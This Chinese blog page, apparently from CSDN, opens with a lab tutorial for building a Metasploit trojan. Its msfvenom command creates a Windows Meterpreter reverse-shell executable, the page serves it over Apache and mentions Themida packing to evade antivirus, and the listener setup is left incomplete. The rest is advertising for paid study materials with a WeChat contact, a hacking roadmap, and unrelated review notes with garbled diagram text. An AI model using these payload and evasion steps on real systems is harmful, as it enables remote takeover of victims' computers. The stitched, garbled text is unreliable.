【网络安全】 MSF生成木马教程(1),2024年最新网络安全视频开发面试问题

环境准备:

名称系统位数IP
攻击机Kali Linux6410.3.0.231
客户端Windows 76410.3.0.234
一、生成木马

1、在Kali机器上面生成木马,注意这里是64位的木马

msfvenom -p windows/x64/meterpreter/reverse_tcp -b ‘\x00\x0b’ -f exe lhost=10.3.0.231 lport=9999 -o /var/www/html/shellx64.exe

2、启动Apache,方便客户端下载

service apache2 start

3、免杀加壳:本例用的是 Themida

二、Kali 开启监听

1、开启MSF

┌──(root㉿Kali)-[~]
└─# msfconsole

2、使用监听模块

msf6 > use exploit/multi/handler

输出

[*] Using configured payload generic/shell_reverse_tcp

2、设置Payload

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

输出

payload => windows/x64/meterpreter/reverse_tcp

3、设置监听IP

msf6 exploit(multi/handler) > set lhost 10.3.0.231

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

如何自学黑客&网络安全

黑客零基础入门学习路线&规划

初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!

7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

8、超级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
img

网络安全工程师企业级学习路线

img
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的

视频配套资料&国内外网安书籍、文档&工具

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

img
一些笔者自己买的、其他平台白嫖不到的视频教程。
img

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

p?x-oss-process=image/format,png)

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-kJV33EBV-1712767545673)]

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
计算机网络安全总结 网络安全技术复习 网络安全基础知识 网络安全的定义:安全就是最大限度地减少数据和资源被攻击的可能性。 1、 网络安全包括四个方面:物理安全、 数据安全、软件安全安全管理。 2、 网络安全的目标:1、保密性(保密性是网络信息不被泄露给非授权的用户、 实体、或供其利用的特性。即防止信息泄露给未授权用户或实体, 信息只为授权 用户使用的特性。)2、完整性(完整性是网络信息未经授权不能进行改变的特 性。)3、可靠性(可靠性网络信息系统能够在规定条件下和规定时间内完成规 定功能的特性。)4、可用性(可用性是网络信息可被授权用户或实体访问并按需 求使用的特性。)5、不可抵赖性(是不可否认性。)6可控性(是对网络信息的 传播及内容具有控制能力的特性。) 3、网络安全的威胁:(1)对加密算法的攻击(2)协议漏洞渗透(3)系统漏洞 (4)拒绝服务攻击(5)计算机病毒和恶意代码的威胁 4、 威胁网络安全的因素:(1)自然因素(2)人为因素(3)系统本身因素 5、 网络安全防范体系 系统安安全管理网络安物理安全全全用安应 系 统 安 安全管理 网络安 物理安全 全 全 用 安 应 6网络安全策略(物理安全策略、访问控制策略、加密策略) 7、网络安全的评估标准 、网络入侵技术 1、 黑客技术(黑客最早源自英文 hacker,原指热衷于计算机程序的设计者和精 通网络、系统、外围设备及软硬件技术的人。这些人具有操作系统和编程语言方 面的知识,通过分析知道系统中的漏洞及其原因, 并公开他们的发现,与他人分 享。现在人们常常把从事网络攻击和破坏的人统称为黑客。) 黑客入侵攻击的一般过程可分踩点、扫描、查点、获取权限、提升权限、窃取 信息、隐藏痕迹、创建后门等。 计算机网络安全总结复习全文共5页,当前为第1页。2、 网络扫描:地址扫描、端口扫描、漏洞扫描。 计算机网络安全总结复习全文共5页,当前为第1页。 常用的扫描软件:Nmap X— Scan等。 3、 网络监听 4、 木马攻击(木马是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是 具有破坏和删除文件、发送密码、记录键盘和拒绝服务攻击等特殊功能的后门程 序。) 5、 拒绝服务攻击(简称DoS,是一种最常见的攻击形式,是指一个用户占据了大 量的共享资源,使系统没有剩余的资源给其他用户使用,即拒绝服务。造成的 DoS攻击行为称为DoS攻击 常见DoS攻击手段有:死亡之Ping、UDP洪泛攻击、SYNFIood攻击、La nd攻击、 Smurf攻击、电子邮件炸弹、畸形消息攻击、泪滴攻击、分布式拒绝服务攻击。 6缓冲区溢出 三、数字加密与认证 1、密码学基础 2、网络数据加密方式(链路加密、结点加密、端到端加密) 3、常用的加密算法:(1)对称加密算法是指加密算法的加密密钥与解密密钥是 相同的,或虽然不同但有其中一个可以很容易推出另一个。常见的算法: DES算 法、IDEA算法。 (2)非对称加密算法是加密密钥和解密密钥不是同一个,通常有两个密钥,一 个是公钥,一个是私钥,必须配对使用,否则不能打开加密文件。常见的算法: RSA算 法。 (3)混合加密算法是对称加密算法和非对称加密算法的结合。 明文dashSA要加密数字签名明 文解密数 字 签 名加密(公钥)密文A 的 公 钥 证 书SB数字信封密文解密sh、摘要2 〉明 文数 字 签 名A 的 公 钥 证 书数字信封>钥匙摘要1B的公钥证书PB (加密)数字信封数字签名PA解密 明文das h SA要 加密 数字签名 明 文 解密 数 字 签 名 加密(公钥) 密文 A 的 公 钥 证 书 SB 数字信封 密文 解密 sh 、 摘要2 〉 明 文 数 字 签 名 A 的 公 钥 证 书 数字信封 >钥匙 摘要1 B的公钥证书 PB (加密) 数字信封 数字签名 PA解密 计算机网络安全总结复习全文共5页,当前为第2页。 计算机网络安全总结复习全文共5页,当前为第2页。 摘要1与摘要2比较,若相同则信息无篡改。 4、数字签名与数字证书:数字签名通过某种密码算法生成一系列符号及代码组成 电子密码进行签名,替代了手写签名或印章。它能验证出文件的原文在传输过程 中有无变动,确保传输电子文件的完整性、真实性、不可抵赖性。 数字证书就是网络通信中标志通信各方身份信息的一系列,其作用类似于现实生 活的身份证A 活的身份证 A A < 商品 数字签名的过程 四、防火墙技术 防火墙是在两个网络间实现访问控制的一个或一组软硬件系统。 其主要功能是屏 蔽和允许指定的数据通信,而该功能的实现主要是依赖一套访问控制策略,由访 问控制策略来决定通信的合法性。防火墙基于一定的软硬件,使互联网与局域网 之间建立起一个安全网关,从而保护内部网免受非法用户的入侵。 防火墙

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值